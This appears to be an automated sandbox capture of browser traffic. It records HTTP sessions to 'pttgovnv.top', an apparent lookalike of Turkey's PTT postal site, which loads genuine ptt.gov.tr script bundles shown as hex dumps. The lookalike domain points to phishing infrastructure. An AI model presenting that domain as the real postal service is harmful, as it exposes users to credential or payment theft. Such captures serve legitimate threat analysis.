          2024-09-01 22:25:36 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liOkJ&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC603INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:36 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Juy8ghp6GCZFta%2BHfJnmiM6RZv1pcmwXOYjRYt7H1kJccNv6KjaeNNcr2KSDelUxmE2e4SXdQ%2FP64aZXyChizqW9A%2F3H6WmuNtwBaBhRZi6rfhnuGD93VR28VoTluLQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad5c5c2ac47f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:36 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:36 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          145192.168.2.449890185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:36 UTC605OUTGET /_next/static/chunks/pages/_app-46fb893087b26370.js HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: script
          Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:37 UTC401INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: application/javascript; charset=UTF-8
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"345f9-19178e938a0"
          Vary: Accept-Encoding
          Date: Sun, 01 Sep 2024 22:25:37 GMT
          Content-Length: 214521
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:37 UTC6870INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 38 38 38 5d 2c 7b 32 34 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 7b 22 2e 2f 65 6e 2f 47 65 74 4c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 52 65 73 70 6f 6e 73 65 22 3a 5b 36 38 35 35 2c 36 38 35 35 5d 2c 22 2e 2f 65 6e 2f 47 65 74 4c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 52 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 22 3a 5b 36 38 35 35 2c 36 38 35 35 5d 2c 22 2e 2f 74 72 2f 47 65 74 4c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 52 65 73 70 6f 6e 73 65 22 3a 5b 36 32 31 39 2c 33 34 30 31 5d 2c 22 2e 2f 74 72 2f 47 65 74 4c 61 6e 67 75 61 67 65 52
          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{242:function(e,t,n){var r={"./en/GetLanguageResourceResponse":[6855,6855],"./en/GetLanguageResourceResponse.json":[6855,6855],"./tr/GetLanguageResourceResponse":[6219,3401],"./tr/GetLanguageR
          2024-09-01 22:25:37 UTC7271INData Raw: 65 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 68 61 6e 64 6c 65 43 61 6c 6c 62 61 63 6b 28 65 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 63 6c 6f 73 65 74 61 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6c 61 73 74 4e 6f 64 65 3d 6e 75 6c 6c 3b 76 61 72 20 65 3d 74 68 69 73 2e 74 61 67 53 74 61 63 6b 2e 70 6f 70 28 29 3b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 77 69 74 68 45 6e 64 49 6e 64 69 63 65 73 26 26 28 65 2e 65 6e 64 49 6e 64 65 78 3d 74 68 69 73 2e 70 61 72 73 65 72 2e 65 6e 64 49 6e 64 65 78 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 43 42 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 43 42 28 65 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 6f 70 65 6e 74 61 67 3d 66 75 6e 63 74 69 6f 6e 28 65
          Data Ascii: e.onerror=function(e){this.handleCallback(e)},e.prototype.onclosetag=function(){this.lastNode=null;var e=this.tagStack.pop();this.options.withEndIndices&&(e.endIndex=this.parser.endIndex),this.elementCB&&this.elementCB(e)},e.prototype.onopentag=function(e
          2024-09-01 22:25:37 UTC7271INData Raw: 2c 66 5b 22 78 2d 73 79 73 74 65 6d 49 64 22 5d 3d 65 5b 22 78 2d 73 79 73 74 65 6d 49 64 22 5d 29 2c 6e 3d 66 7d 72 65 74 75 72 6e 20 6e 2e 73 74 61 72 74 49 6e 64 65 78 3d 65 2e 73 74 61 72 74 49 6e 64 65 78 2c 6e 2e 65 6e 64 49 6e 64 65 78 3d 65 2e 65 6e 64 49 6e 64 65 78 2c 6e 75 6c 6c 21 3d 65 2e 73 6f 75 72 63 65 43 6f 64 65 4c 6f 63 61 74 69 6f 6e 26 26 28 6e 2e 73 6f 75 72 63 65 43 6f 64 65 4c 6f 63 61 74 69 6f 6e 3d 65 2e 73 6f 75 72 63 65 43 6f 64 65 4c 6f 63 61 74 69 6f 6e 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 78 28 65 2c 21 30 29 7d 29 29 2c 6e 3d 31 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 5b 6e 5d 2e 70 72 65
          Data Ascii: ,f["x-systemId"]=e["x-systemId"]),n=f}return n.startIndex=e.startIndex,n.endIndex=e.endIndex,null!=e.sourceCodeLocation&&(n.sourceCodeLocation=e.sourceCodeLocation),n}function T(e){for(var t=e.map((function(e){return x(e,!0)})),n=1;n<t.length;n++)t[n].pre
          2024-09-01 22:25:37 UTC7271INData Raw: 6e 3a 63 7d 7d 2c 35 35 36 30 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 2f 5c 2f 5c 2a 5b 5e 2a 5d 2a 5c 2a 2b 28 5b 5e 2f 2a 5d 5b 5e 2a 5d 2a 5c 2a 2b 29 2a 5c 2f 2f 67 2c 6e 3d 2f 5c 6e 2f 67 2c 72 3d 2f 5e 5c 73 2a 2f 2c 6f 3d 2f 5e 28 5c 2a 3f 5b 2d 23 2f 2a 5c 5c 5c 77 5d 2b 28 5c 5b 5b 30 2d 39 61 2d 7a 5f 2d 5d 2b 5c 5d 29 3f 29 5c 73 2a 2f 2c 61 3d 2f 5e 3a 5c 73 2a 2f 2c 69 3d 2f 5e 28 28 3f 3a 27 28 3f 3a 5c 5c 27 7c 2e 29 2a 3f 27 7c 22 28 3f 3a 5c 5c 22 7c 2e 29 2a 3f 22 7c 5c 28 5b 5e 29 5d 2a 3f 5c 29 7c 5b 5e 7d 3b 5d 29 2b 29 2f 2c 63 3d 2f 5e 5b 3b 5c 73 5d 2a 2f 2c 73 3d 2f 5e 5c 73 2b 7c 5c 73 2b 24 2f 67 2c 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28
          Data Ascii: n:c}},5560:function(e){var t=/\/\*[^*]*\*+([^/*][^*]*\*+)*\//g,n=/\n/g,r=/^\s*/,o=/^(\*?[-#/*\\\w]+(\[[0-9a-z_-]+\])?)\s*/,a=/^:\s*/,i=/^((?:'(?:\\'|.)*?'|"(?:\\"|.)*?"|\([^)]*?\)|[^};])+)/,c=/^[;\s]*/,s=/^\s+|\s+$/g,l="";function u(e){return e?e.replace(
          2024-09-01 22:25:37 UTC7271INData Raw: 65 2c 74 29 7d 28 65 2c 74 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 2e 5c 6e 49 6e 20 6f 72 64 65 72 20 74 6f 20 62 65 20 69 74 65 72 61 62 6c 65 2c 20 6e 6f 6e 2d 61 72 72 61 79 20 6f 62 6a 65 63 74 73 20 6d 75 73 74 20 68 61 76 65 20 61 20 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 20 6d 65 74 68 6f 64 2e 22 29 7d 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 28 6e 75 6c 6c 3d 3d 74 7c 7c 74 3e 65 2e 6c 65 6e 67 74 68 29 26 26 28 74 3d 65 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 6e 65
          Data Ascii: e,t)}(e,t)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function o(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=ne
          2024-09-01 22:25:37 UTC7271INData Raw: 2c 65 64 67 65 4d 6f 64 65 3a 31 2c 65 6c 65 76 61 74 69 6f 6e 3a 30 2c 65 6e 61 62 6c 65 42 61 63 6b 67 72 6f 75 6e 64 3a 31 2c 22 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 22 3a 22 65 6e 61 62 6c 65 42 61 63 6b 67 72 6f 75 6e 64 22 2c 65 6e 64 3a 30 2c 65 78 70 6f 6e 65 6e 74 3a 30 2c 65 78 74 65 72 6e 61 6c 52 65 73 6f 75 72 63 65 73 52 65 71 75 69 72 65 64 3a 31 2c 66 69 6c 6c 3a 30 2c 66 69 6c 6c 4f 70 61 63 69 74 79 3a 31 2c 22 66 69 6c 6c 2d 6f 70 61 63 69 74 79 22 3a 22 66 69 6c 6c 4f 70 61 63 69 74 79 22 2c 66 69 6c 6c 52 75 6c 65 3a 31 2c 22 66 69 6c 6c 2d 72 75 6c 65 22 3a 22 66 69 6c 6c 52 75 6c 65 22 2c 66 69 6c 74 65 72 3a 30 2c 66 69 6c 74 65 72 52 65 73 3a 31 2c 66 69 6c 74 65 72 55 6e 69 74 73 3a 31 2c 66 6c 6f 6f 64 4f 70 61 63
          Data Ascii: ,edgeMode:1,elevation:0,enableBackground:1,"enable-background":"enableBackground",end:0,exponent:0,externalResourcesRequired:1,fill:0,fillOpacity:1,"fill-opacity":"fillOpacity",fillRule:1,"fill-rule":"fillRule",filter:0,filterRes:1,filterUnits:1,floodOpac
          2024-09-01 22:25:37 UTC7271INData Raw: 2c 68 61 6e 64 6c 65 43 68 61 6e 67 65 57 72 61 70 70 65 72 3a 6f 2c 69 73 53 75 62 73 63 72 69 62 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 6e 29 7d 2c 74 72 79 53 75 62 73 63 72 69 62 65 3a 61 2c 74 72 79 55 6e 73 75 62 73 63 72 69 62 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 26 26 28 6e 28 29 2c 6e 3d 76 6f 69 64 20 30 2c 72 2e 63 6c 65 61 72 28 29 2c 72 3d 45 29 7d 2c 67 65 74 4c 69 73 74 65 6e 65 72 73 3a 28 29 3d 3e 72 7d 3b 72 65 74 75 72 6e 20 69 7d 63 6f 6e 73 74 20 53 3d 21 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 7c 7c 22 75 6e 64 65 66 69 6e 65
          Data Ascii: ,handleChangeWrapper:o,isSubscribed:function(){return Boolean(n)},trySubscribe:a,tryUnsubscribe:function(){n&&(n(),n=void 0,r.clear(),r=E)},getListeners:()=>r};return i}const S=!("undefined"===typeof window||"undefined"===typeof window.document||"undefine
          2024-09-01 22:25:37 UTC7271INData Raw: 69 64 20 30 21 3d 3d 72 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 3f 72 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 3a 75 7d 2c 38 36 36 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 32 34 36 36 29 2c 6f 3d 6e 28 35 32 35 32 29 3b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 69 73 3f 4f 62 6a 65 63 74 2e 69 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 30 21 3d 3d 65 7c 7c 31 2f 65 3d 3d 3d 31 2f 74 29 7c 7c 65 21 3d 3d 65 26 26 74 21 3d 3d 74 7d 2c 69 3d 6f 2e 75 73 65 53 79 6e 63 45 78 74 65 72 6e 61 6c 53 74 6f 72 65 2c 63 3d 72 2e 75 73 65 52
          Data Ascii: id 0!==r.useSyncExternalStore?r.useSyncExternalStore:u},8667:function(e,t,n){"use strict";var r=n(2466),o=n(5252);var a="function"===typeof Object.is?Object.is:function(e,t){return e===t&&(0!==e||1/e===1/t)||e!==e&&t!==t},i=o.useSyncExternalStore,c=r.useR
          2024-09-01 22:25:37 UTC7271INData Raw: 2e 43 4f 4e 53 54 41 4e 54 29 2c 4f 4e 4c 49 4e 45 5f 54 52 41 4e 53 41 43 54 49 4f 4e 53 3a 22 31 61 33 63 34 34 66 66 2d 37 62 61 62 2d 34 37 61 30 2d 62 31 31 31 2d 38 37 32 65 65 64 65 30 66 35 65 33 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 53 45 52 56 49 43 45 53 3a 22 66 39 39 62 39 33 33 30 2d 36 39 31 35 2d 34 65 36 39 2d 61 38 38 64 2d 33 33 39 65 31 39 30 37 36 64 65 66 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 43 55 53 54 4f 4d 5f 53 45 52 56 49 43 45 53 5f 50 4f 53 54 3a 22 62 39 35 63 66 38 31 38 2d 33 65 32 33 2d 34 31 61 38 2d 62 65 35 39 2d 36 31 32 32 37 35 30 32 65 62 38 63 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 43 55 53 54 4f 4d 5f 53 45 52 56 49 43 45 53 5f 42
          Data Ascii: .CONSTANT),ONLINE_TRANSACTIONS:"1a3c44ff-7bab-47a0-b111-872eede0f5e3*".concat(a.CONSTANT),SERVICES:"f99b9330-6915-4e69-a88d-339e19076def*".concat(a.CONSTANT),CUSTOM_SERVICES_POST:"b95cf818-3e23-41a8-be59-61227502eb8c*".concat(a.CONSTANT),CUSTOM_SERVICES_B
          2024-09-01 22:25:37 UTC7271INData Raw: 45 4e 54 41 54 49 4f 4e 5f 54 4f 5f 43 55 53 54 4f 4d 53 5f 46 45 45 3a 22 32 64 65 63 62 32 37 35 2d 33 30 37 39 2d 34 32 39 66 2d 39 61 31 61 2d 64 66 35 35 35 35 63 35 63 65 65 62 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 53 54 5f 4f 56 45 52 53 45 41 53 5f 52 45 54 55 52 4e 5f 46 45 45 3a 22 37 63 36 34 62 34 66 66 2d 65 32 62 34 2d 34 66 35 33 2d 39 61 30 64 2d 65 33 33 62 33 39 31 38 63 36 30 31 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 53 54 5f 50 41 59 4d 45 4e 54 5f 54 45 52 4d 5f 46 45 45 3a 22 32 62 33 37 64 32 34 62 2d 37 61 61 61 2d 34 30 62 32 2d 61 32 33 65 2d 62 63 32 39 65 37 39 61 66 37 30 61 2a 22 2e 63 6f 6e 63 61 74 28 61 2e 43 4f 4e 53 54 41 4e 54 29 2c 53 54 5f 54 4f 54 41 4c 3a 22 66
          Data Ascii: ENTATION_TO_CUSTOMS_FEE:"2decb275-3079-429f-9a1a-df5555c5ceeb*".concat(a.CONSTANT),ST_OVERSEAS_RETURN_FEE:"7c64b4ff-e2b4-4f53-9a0d-e33b3918c601*".concat(a.CONSTANT),ST_PAYMENT_TERM_FEE:"2b37d24b-7aaa-40b2-a23e-bc29e79af70a*".concat(a.CONSTANT),ST_TOTAL:"f


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          146192.168.2.449891185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:37 UTC385OUTGET /_next/static/chunks/webpack-9869d3074c720ef6.js HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:37 UTC398INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: application/javascript; charset=UTF-8
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"102b-19178e938a0"
          Vary: Accept-Encoding
          Date: Sun, 01 Sep 2024 22:25:36 GMT
          Content-Length: 4139
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:37 UTC4139INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 7d 2c 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 76 61 72 20 6f 3d 74 5b 72 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 29 72 65 74 75 72 6e 20 6f 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 75 3d 74 5b 72 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 69 3d 21 30 3b 74 72 79 7b 65 5b 72 5d 2e 63 61 6c 6c 28 75 2e 65 78 70 6f 72 74 73 2c 75 2c 75 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 69 26 26 64 65 6c 65 74 65 20 74 5b 72 5d 7d 72 65 74 75 72 6e 20 75 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 6e 2e 4f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6f 2c 75 29
          Data Ascii: !function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var u=t[r]={exports:{}},i=!0;try{e[r].call(u.exports,u,u.exports,n),i=!1}finally{i&&delete t[r]}return u.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,u)


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          147192.168.2.449895172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:37 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liP4B&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 1
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:37 UTC1OUTData Raw: 31
          Data Ascii: 1
          2024-09-01 22:25:37 UTC603INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:37 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wXxqf4hwIgF%2BdPHAliXmyMSy9Zis9qnJnm9Ebe7JOLW4HAyBVAWbWaXnwsLIXs7AmEeOEsLZRsWPKc7DzGhbRpLtrOnI6B6ivcna7sPe7MEaX%2FSTmruZdMv%2FRKsus0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad60dee64322-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:37 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:37 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          148192.168.2.449892185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:37 UTC607OUTGET /_next/static/chunks/pages/_error-32d9baaae5c99c79.js HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: script
          Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:37 UTC396INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: application/javascript; charset=UTF-8
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"25e-19178e938a0"
          Vary: Accept-Encoding
          Date: Sun, 01 Sep 2024 22:25:37 GMT
          Content-Length: 606
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:37 UTC606INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 38 32 30 5d 2c 7b 32 39 30 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 28 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 3d 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 22 2f 5f 65 72 72 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 36 39 35 33 29 7d 5d 29 7d 2c 36 39 35 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 6e 29 3b 76 61 72 20 75 3d 72 28 33 32 38 38 29 2c 65 3d 72 28 38 30 33 32 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 76 61 72 20 6e 3d 74
          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4820],{2904:function(t,n,r){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_error",function(){return r(6953)}])},6953:function(t,n,r){"use strict";r.r(n);var u=r(3288),e=r(8032);function s(t){var n=t


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          149192.168.2.449893185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:37 UTC607OUTGET /_next/static/JxrWbfN16VK5LXe_vQYf2/_buildManifest.js HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: script
          Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:37 UTC398INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: application/javascript; charset=UTF-8
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"2010-19178e938a0"
          Vary: Accept-Encoding
          Date: Sun, 01 Sep 2024 22:25:37 GMT
          Content-Length: 8208
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:37 UTC6873INData Raw: 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 2c 61 2c 73 2c 74 2c 72 2c 63 2c 6e 2c 64 2c 75 2c 6f 2c 67 2c 70 2c 6c 2c 6d 2c 68 2c 6b 2c 62 2c 66 2c 6a 2c 79 2c 46 2c 50 2c 5f 2c 49 29 7b 72 65 74 75 72 6e 7b 5f 5f 72 65 77 72 69 74 65 73 3a 7b 62 65 66 6f 72 65 46 69 6c 65 73 3a 5b 5d 2c 61 66 74 65 72 46 69 6c 65 73 3a 5b 5d 2c 66 61 6c 6c 62 61 63 6b 3a 5b 5d 7d 2c 22 2f 22 3a 5b 69 2c 61 2c 73 2c 74 2c 72 2c 22 73 74 61 74 69 63 2f 63 73 73 2f 32 34 32 35 63 62 61 31 30 64 65 31 36 34 35 62 2e 63 73 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 69 6e 64 65 78 2d 64 66 62 37 65 31 32 36 31 65 61 30 65 30 36 66 2e 6a 73 22 5d 2c 22 2f 5f 65 72 72 6f 72 22 3a 5b 22 73 74
